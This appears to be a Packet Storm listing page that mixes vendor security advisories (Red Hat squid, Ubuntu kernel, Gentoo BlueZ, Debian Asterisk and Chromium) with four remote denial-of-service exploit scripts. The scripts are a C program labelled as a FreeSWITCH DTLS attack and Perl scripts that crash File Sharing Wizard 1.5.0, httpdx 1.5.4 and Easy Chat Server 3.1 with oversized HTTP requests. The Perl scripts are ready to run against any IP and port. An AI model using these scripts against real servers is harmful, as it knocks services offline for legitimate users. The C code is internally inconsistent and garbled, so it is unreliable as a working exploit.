Red Hat Security Advisory 2024-0072-03 - An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0072.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security updateAdvisory ID:        RHSA-2024:0072-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0072Issue date:         2024-01-08Revision:           03CVE Names:          CVE-2023-5824====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: DoS against HTTP and HTTPS (CVE-2023-5824)* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5824References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2245914https://bugzilla.redhat.com/show_bug.cgi?id=2247567https://bugzilla.redhat.com/show_bug.cgi?id=2248521https://bugzilla.redhat.com/show_bug.cgi?id=2252923https://bugzilla.redhat.com/show_bug.cgi?id=2252926

Red Hat Security Advisory 2024-0072-03

Red Hat Security Advisory 2024-0071-03 - An update for squid is now available for Red Hat Enterprise Linux 9. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0071.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security updateAdvisory ID:        RHSA-2024:0071-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0071Issue date:         2024-01-08Revision:           03CVE Names:          CVE-2023-46724====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46724References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2247567https://bugzilla.redhat.com/show_bug.cgi?id=2248521https://bugzilla.redhat.com/show_bug.cgi?id=2252923https://bugzilla.redhat.com/show_bug.cgi?id=2252926

Red Hat Security Advisory 2024-0071-03

FreeSWITCH versions prior to 1.10.11 remote denial of service exploit that leverages a race condition in the hello handshake phase of the DTLS protocol.

    #include <stdio.h#include <string.h>#include <unistd.h>#include <openssl/ssl.h>#include <openssl/err.h>#define IP "127.0.0.1"#define PORT 5061int main() {    SSL_library_init();    SSL_load_error_strings();    OpenSSL_add_ssl_algorithms();    const SSL_METHOD *method = TLS_server_method();    SSL_CTX *ctx = SSL_CTX_new(method);    if (!ctx) {        fprintf(stderr, "Unable to create SSL context\n");        ERR_print_errors_fp(stderr);        return 1;    }    SSL *ssl = SSL_new(ctx);    if (!ssl) {        fprintf(stderr, "Unable to create SSL\n");        ERR_print_errors_fp(stderr);        return 1;    }    if (SSL_set_fd(ssl, fileno(stdin)) <= 0) {        fprintf(stderr, "Unable to set SSL file descriptor\n");        ERR_print_errors_fp(stderr);        return 1;    }    if (SSL_set_connect_state(ssl) <= 0) {        fprintf(stderr, "Unable to set SSL connect state\n");        ERR_print_errors_fp(stderr);        return 1;    }    const SSL_CIPHER *cipher = SSL_CIPHER_find("TLS_NULL_WITH_NULL_NULL");    if (!cipher) {        fprintf(stderr, "Unable to find cipher\n");        ERR_print_errors_fp(stderr);        return 1;    }    SSL_set_cipher_list(ssl, "TLS_NULL_WITH_NULL_NULL");    if (SSL_connect(ssl) <= 0) {        fprintf(stderr, "Unable to connect\n");        ERR_print_errors_fp(stderr);        return 1;    }    printf("Connected with cipher %s\n", SSL_CIPHER_get_name(SSL_get_current_cipher(ssl)));    // Send malicious ClientHello messages continuously    while (1) {        if (SSL_connect(ssl) <= 0) {            fprintf(stderr, "Unable to connect\n");            ERR_print_errors_fp(stderr);            return 1;        }        sleep(1);    }    SSL_shutdown(ssl);    SSL_free(ssl);    SSL_CTX_free(ctx);    EVP_cleanup();    return 0;}

FreeSWITCH Denial Of Service

File Sharing Wizard version 1.5.0 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: File Sharing Wizard 1.5.0 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 07 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/13fs9IHSaGQ27YIQNDyrQV20jCT7owPQ6/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: File Sharing Wizard 1.5.0  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1gPiMU0Wemdx-rxEzAPhQCyparn1JiX0j/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via method GET to web server.  
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $exploit = "\x41"x1360;

    my $payload_header  = "GET " . $exploit;  
    $payload_header .= " HTTP/1.0\r\n\r\n";

    my $connect = IO::Socket::INET->new(  
       PeerAddr => $ip,  
       PeerPort => $port,  
       Proto    => 'tcp'  
    ) or die "Unable to connect to the victim: $!\n";

    $connect->send($payload_header);  
    close $connect;

    print "[+] Done! Exploited!\n";

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "#################################################################\n";  
      print "#           File Sharing Wizard 1.5.0 - Denied of Service       #\n";  
      print "#                                                               #\n";  
      print "#                Coded by Fernando Mengali                      #\n";  
      print "#                                                               #\n";  
      print "#              e-mail: fernando.mengalli\@gmail.com             #\n";  
      print "#                                                               #\n";  
      print "#################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

File Sharing Wizard 1.5.0 Denial Of Service

httpdx version 1.5.4 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: httpdx 1.5.4 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 06 january 2024  
# Vendor Homepage:  http://httpdx.sourceforge.net  
# Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/  
# Download 2 to demo:https://drive.google.com/file/d/1Slsd7qCPom4uoSPXdiONS4xh-8tp4fkV/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: httpdx 1.5.4 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1hGn5AZbtVTzA_oiZPZ9yOVzIBVzKYGhQ/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The web server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

   my $sock = IO::Socket::INET->new("$ip:$port");

   my $exploit = "\x41"x1040;

   print $sock "POST /index2.html HTTP/1.0\r\n" .   
    "Content-Length: 1023\r\n" .   
    "Content-Type: html\r\n" .   
    "Host: $ip" . "\r\n" .  
    "\r\n" .  
    $exploit;

                print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

      ---------- # ------------------------------------------------------------------  
      --------- ##= -------------- [+] httpdx 1.5.4 - Denied of Service (DoS) -------  
      -------- ##=== ----------------------------------------------------------------  
      ------ ###==#=== --------------------------------------------------------------  
      ---- ####===##==== ------------------------------------------------------------  
      -- #####====###===== -----          Coded by Fernando Mengali             -----  
      - #####=====####===== -----        fernando.mengalli@gmail.com            -----  
      - #####=====####===== ---------------------------------------------------------  
      --- ####=  #  #==== --------    Prepare to exploiting the server   ------------  
      --------- ##= -----------------------------------------------------------------  
      ------- ####=== ---------------------------------------------------------------

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

httpdx 1.5.4 Denial Of Service

Ubuntu Security Notice 6549-4 - It was discovered that the USB subsystem in the Linux kernel contained a race condition while handling device descriptors in certain situations, leading to a out-of-bounds read vulnerability. A local attacker could possibly use this to cause a denial of service. Lin Ma discovered that the Netlink Transformation subsystem in the Linux kernel did not properly initialize a policy data structure, leading to an out-of-bounds vulnerability. A local privileged attacker could use this to cause a denial of service or possibly expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6549-4  
January 05, 2024

linux-intel-iotg vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms

Details:

It was discovered that the USB subsystem in the Linux kernel contained a  
race condition while handling device descriptors in certain situations,  
leading to a out-of-bounds read vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-37453)

Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel did not properly initialize a policy data structure, leading  
to an out-of-bounds vulnerability. A local privileged attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information (kernel memory). (CVE-2023-3773)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate some attributes passed from userspace. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly expose sensitive information (kernel memory). (CVE-2023-39189)

Sunjoo Park discovered that the netfilter subsystem in the Linux kernel did  
not properly validate u32 packets content, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39192)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate SCTP data, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39193)

Lucas Leong discovered that the Netlink Transformation (XFRM) subsystem in  
the Linux kernel did not properly handle state filters, leading to an out-  
of-bounds read vulnerability. A privileged local attacker could use this to  
cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2023-39194)

It was discovered that a race condition existed in QXL virtual GPU driver  
in the Linux kernel, leading to a use after free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-39198)

Kyle Zeng discovered that the IPv4 implementation in the Linux kernel did  
not properly handle socket buffers (skb) when performing IP routing in  
certain circumstances, leading to a null pointer dereference vulnerability.  
A privileged attacker could use this to cause a denial of service (system  
crash). (CVE-2023-42754)

Jason Wang discovered that the virtio ring implementation in the Linux  
kernel did not properly handle iov buffers in some situations. A local  
attacker in a guest VM could use this to cause a denial of service (host  
system crash). (CVE-2023-5158)

Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel  
did not properly handle queue initialization failures in certain  
situations, leading to a use-after-free vulnerability. A remote attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-5178)

Budimir Markovic discovered that the perf subsystem in the Linux kernel did  
not properly handle event groups, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-5717)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1046-intel-iotg  5.15.0-1046.52  
   linux-image-intel-iotg          5.15.0.1046.46

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6549-4  
   https://ubuntu.com/security/notices/USN-6549-1  
   CVE-2023-37453, CVE-2023-3773, CVE-2023-39189, CVE-2023-39192,  
   CVE-2023-39193, CVE-2023-39194, CVE-2023-39198, CVE-2023-42754,  
   CVE-2023-5158, CVE-2023-5178, CVE-2023-5717

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1046.52

Ubuntu Security Notice USN-6549-4

Gentoo Linux Security Advisory 202401-3 - Multiple vulnerabilities have been discovered in Bluez, the worst of which can lead to privilege escalation. Versions greater than or equal to 5.70-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: BlueZ: Privilege Escalation  
     Date: January 05, 2024  
     Bugs: #919383  
       ID: 202401-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Bluez, the worst of  
which can lead to privilege escalation.

Background  
=========  
BlueZ is the canonical bluetooth tools and system daemons package for  
Linux.

Affected packages  
================  
Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
net-wireless/bluez  < 5.70-r1     >= 5.70-r1

Description  
==========  
Multiple vulnerabilities have been discovered in BlueZ. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
An attacker may inject unauthenticated keystrokes via Bluetooth, leading  
to privilege escalation or denial of service.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All BlueZ users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-wireless/bluez-5.70-r1"

References  
=========  
[ 1 ] CVE-2023-45866  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45866

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-03

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-03

Debian Linux Security Advisory 5596-1 - Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5596-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
January 04, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : asterisk  
CVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786  
Debian Bug     : 1059303 1059032 1059033

Multiple security vulnerabilities have been discovered in Asterisk, an Open  
Source Private Branch Exchange.

CVE-2023-37457

    The 'update' functionality of the PJSIP_HEADER dialplan function can exceed  
    the available buffer space for storing the new value of a header. By doing  
    so this can overwrite memory or cause a crash. This is not externally  
    exploitable, unless dialplan is explicitly written to update a header based  
    on data from an outside source. If the 'update' functionality is not used  
    the vulnerability does not occur.

CVE-2023-38703

    PJSIP is a free and open source multimedia communication library written in  
    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a  
    higher level media transport which is stacked upon a lower level media  
    transport such as UDP and ICE. Currently a higher level transport is not  
    synchronized with its lower level transport that may introduce a  
    use-after-free issue. This vulnerability affects applications that have  
    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media  
    transport other than UDP. This vulnerability’s impact may range from  
    unexpected application termination to control flow hijack/memory  
    corruption.

CVE-2023-49294

    It is possible to read any arbitrary file even when the `live_dangerously`  
    option is not enabled.

CVE-2023-49786

   Asterisk is susceptible to a DoS due to a race condition in the hello  
   handshake phase of the DTLS protocol when handling DTLS-SRTP for media  
   setup. This attack can be done continuously, thus denying new DTLS-SRTP  
   encrypted calls during the attack. Abuse of this vulnerability may lead to  
   a massive Denial of Service on vulnerable Asterisk servers for calls that  
   rely on DTLS-SRTP.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:16.28.0~dfsg-0+deb11u4.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F  
Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl  
AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b  
zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk  
T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb  
bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu  
mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh  
bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ  
Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+  
sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU  
+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5596-1

Debian Linux Security Advisory 5595-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5595-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJanuary 04, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-0222 CVE-2024-0223 CVE-2024-0224 CVE-2024-0225Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 120.0.6099.199-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 120.0.6099.199-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmWW+3wACgkQZF0CR8NudjdB2g/9Fg/GWkG5zWX5NNzw/n4uMT8eCLLYbuvtpYGwwlQ9zKoQdVDUbK4pJlNYBbutP+VXf/6PoeIxOrs4weP+vBd0nY7GRyE/IthzKrai1/itXwCtoRWx+nGaPQfTvGNpwoHBBYk115c6gSwXrrYa5jeLDgN7uVeXRk3ZLKbChDwEmbW4qgPU60k1EGreqaygwV4si93uTWla3IhTiqaMStEgoANNBXE+61qC/+Y+RxNgXB3DlX/yE5UGv2DFJ5y0fbiyA5oQrOuoRp/VwYKRrPovOP/GvtxTW9+O5NkG2Fi5V7Wp8Eafq6N0Y0KTFZgtK/pH5iAVndEKNyNAWPAW048IHc5jKlY7hTrC2KAkCC5WoBqeKsijnzhSEJ0YZsDr/3I2CbU7b8IoiWB//+bJaVtSrMxsXOs7qVxrkPwCiVIwN1tS6h2sw/A0VbzaVKGxsqe6mW1m/0xvzeUwffI6HiF7xwB9fNVWDTCIWqIYKI1DvyttJ1y25I00gbVWfW3HNOFjdCR/gA7jtCWeoX1Jk+QLkNlhSbN/l4wSuJSCvFXMbRFTPdv6l12f8u7IcabJKoTLp/8vK7UK1IEjMIutncc9uRbgwT1hProOToF3RQo7sgU/N0s9dOj8TLRZLYHYMaDhwY/PbebB2/3LuV3m4G9VMl2DzTk5WW39lQmqnTPXYSY=Hl1s-----END PGP SIGNATURE-----

Debian Security Advisory 5595-1

Easy Chat Server version 3.1 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Easy Chat Server 3.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 05 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1ZbfeaWSEKlpvCG1eUtD0vNnfkNz_8PlE/view  
# Notification vendor: No reported  
# Tested Version:Easy Chat Server 3.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1rG6uTXTg3cTg86qmp9rh2ozQfyOV_Av7/view

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via method GET to web server.  
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x90" x 16;  
    $payload = "\x41"x568;

my $buffer = "GET /chat.ghp?username=" . $payload . "&password=&room=2 HTTP/1.1\r\n";  
$buffer .= "User-Agent: Internet Explorer/4.0\r\n";  
$buffer .= "Host: $ip:$port\r\n";  
$buffer .= "Referer: http://$ip\r\n";  
$buffer .= "Connection: Keep-Alive\r\n\r\n";

print("[+] Exploiting...\n");  
my $socket = IO::Socket::INET->new(  
    PeerAddr => $ip,  
    PeerPort => $port,  
    Proto    => 'tcp',  
) or die "Could not connect! Error: $!\n";

$socket->send($buffer);  
close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "#################################################################\n";  
      print "#           Easy Chat Server 3.1 - Denied of Service            #\n";  
      print "#                                                               #\n";  
      print "#                Coded by Fernando Mengali                      #\n";  
      print "#                                                               #\n";  
      print "#              e-mail: fernando.mengalli\@gmail.com             #\n";  
      print "#                                                               #\n";  
      print "#################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Tag

#dos